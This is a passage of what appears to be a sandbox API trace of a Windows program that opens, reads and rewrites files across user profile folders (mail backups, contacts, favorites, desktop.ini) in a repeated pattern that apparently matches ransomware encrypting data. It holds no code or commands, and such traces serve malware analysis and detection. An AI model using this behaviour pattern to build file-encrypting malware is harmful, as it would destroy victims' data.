out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2e9f2bc*=0x401, lpOverlapped=0x0) returned 1 [0189.640] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.640] WriteFile (in: hFile=0x214, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x989, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x989, lpOverlapped=0x0) returned 1 [0189.641] CloseHandle (hObject=0x214) returned 1 [0189.641] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.642] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.642] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4000 [0189.642] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.642] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.642] ReleaseMutex (hMutex=0x168) returned 1 [0189.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.pat", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.pat", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.pat", lpUsedDefaultChar=0x0) returned 15 [0189.642] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0189.645] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0189.645] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0189.646] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0189.646] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0189.647] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0189.647] WriteFile (in: hFile=0x214, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0189.647] CloseHandle (hObject=0x214) returned 1 [0189.647] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.648] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.648] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xeb [0189.648] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.648] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.648] ReleaseMutex (hMutex=0x168) returned 1 [0189.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hand Prints.htm", cchWideChar=15, lpMultiByteStr=0x1f7352c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hand Prints.htm", lpUsedDefaultChar=0x0) returned 15 [0189.649] ReadFile (in: hFile=0x214, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xeb, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x2e9f2bc*=0xeb, lpOverlapped=0x0) returned 1 [0189.650] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.650] WriteFile (in: hFile=0x214, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x673, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x673, lpOverlapped=0x0) returned 1 [0189.650] CloseHandle (hObject=0x214) returned 1 [0189.650] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.651] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.651] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4000 [0189.651] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.651] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.651] ReleaseMutex (hMutex=0x168) returned 1 [0189.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.pat", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0189.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.pat", cchWideChar=15, lpMultiByteStr=0x1f7346c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.pat", lpUsedDefaultChar=0x0) returned 15 [0189.651] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0189.653] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0189.653] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0189.654] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0189.654] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0189.655] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0189.655] WriteFile (in: hFile=0x214, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0189.655] CloseHandle (hObject=0x214) returned 1 [0189.655] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.656] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.656] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x10b1e [0189.656] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.656] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.656] ReleaseMutex (hMutex=0x168) returned 1 [0189.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0189.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Administrator.contact", lpUsedDefaultChar=0x0) returned 21 [0189.656] ReadFile (in: hFile=0x214, lpBuffer=0x2665568, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2665568*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0189.658] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xfb1e [0189.658] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0189.659] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xfb1e [0189.659] WriteFile (in: hFile=0x214, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0189.660] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0189.660] WriteFile (in: hFile=0x214, lpBuffer=0x2665568*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665568*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0189.660] CloseHandle (hObject=0x214) returned 1 [0189.660] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.661] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.661] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x85 [0189.661] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.661] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.661] ReleaseMutex (hMutex=0x168) returned 1 [0189.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0189.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE Add-on site.url", lpUsedDefaultChar=0x0) returned 18 [0189.662] ReadFile (in: hFile=0x214, lpBuffer=0x2673210, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673210*, lpNumberOfBytesRead=0x2e9f2bc*=0x85, lpOverlapped=0x0) returned 1 [0189.663] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.663] WriteFile (in: hFile=0x214, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0189.663] CloseHandle (hObject=0x214) returned 1 [0189.664] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.664] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.664] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x85 [0189.664] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.664] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.665] ReleaseMutex (hMutex=0x168) returned 1 [0189.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0189.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Sports.url", lpUsedDefaultChar=0x0) returned 14 [0189.665] ReadFile (in: hFile=0x214, lpBuffer=0x2673210, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673210*, lpNumberOfBytesRead=0x2e9f2bc*=0x85, lpOverlapped=0x0) returned 1 [0189.666] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.666] WriteFile (in: hFile=0x214, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0189.666] CloseHandle (hObject=0x214) returned 1 [0189.666] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.667] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.667] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1d3 [0189.667] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.667] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.667] ReleaseMutex (hMutex=0x168) returned 1 [0189.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.lnk", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.lnk", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop.lnk", lpUsedDefaultChar=0x0) returned 11 [0189.668] ReadFile (in: hFile=0x214, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x1d3, lpOverlapped=0x0) returned 1 [0189.669] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.669] WriteFile (in: hFile=0x214, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x75b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x75b, lpOverlapped=0x0) returned 1 [0189.669] CloseHandle (hObject=0x214) returned 1 [0189.669] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.670] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.670] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1f8 [0189.670] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.670] ReleaseMutex (hMutex=0x168) returned 1 [0189.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0189.671] ReadFile (in: hFile=0x214, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1f8, lpOverlapped=0x0) returned 1 [0189.672] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.672] WriteFile (in: hFile=0x214, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x780, lpOverlapped=0x0) returned 1 [0189.672] CloseHandle (hObject=0x214) returned 1 [0189.672] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.673] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.673] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xae [0189.673] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.674] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.674] ReleaseMutex (hMutex=0x168) returned 1 [0189.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0189.674] ReadFile (in: hFile=0x214, lpBuffer=0x1f39b58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f39b58*, lpNumberOfBytesRead=0x2e9f2bc*=0xae, lpOverlapped=0x0) returned 1 [0189.675] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.675] WriteFile (in: hFile=0x214, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x636, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x636, lpOverlapped=0x0) returned 1 [0189.675] CloseHandle (hObject=0x214) returned 1 [0189.675] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.676] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.676] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x17c [0189.676] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.676] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.676] ReleaseMutex (hMutex=0x168) returned 1 [0189.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 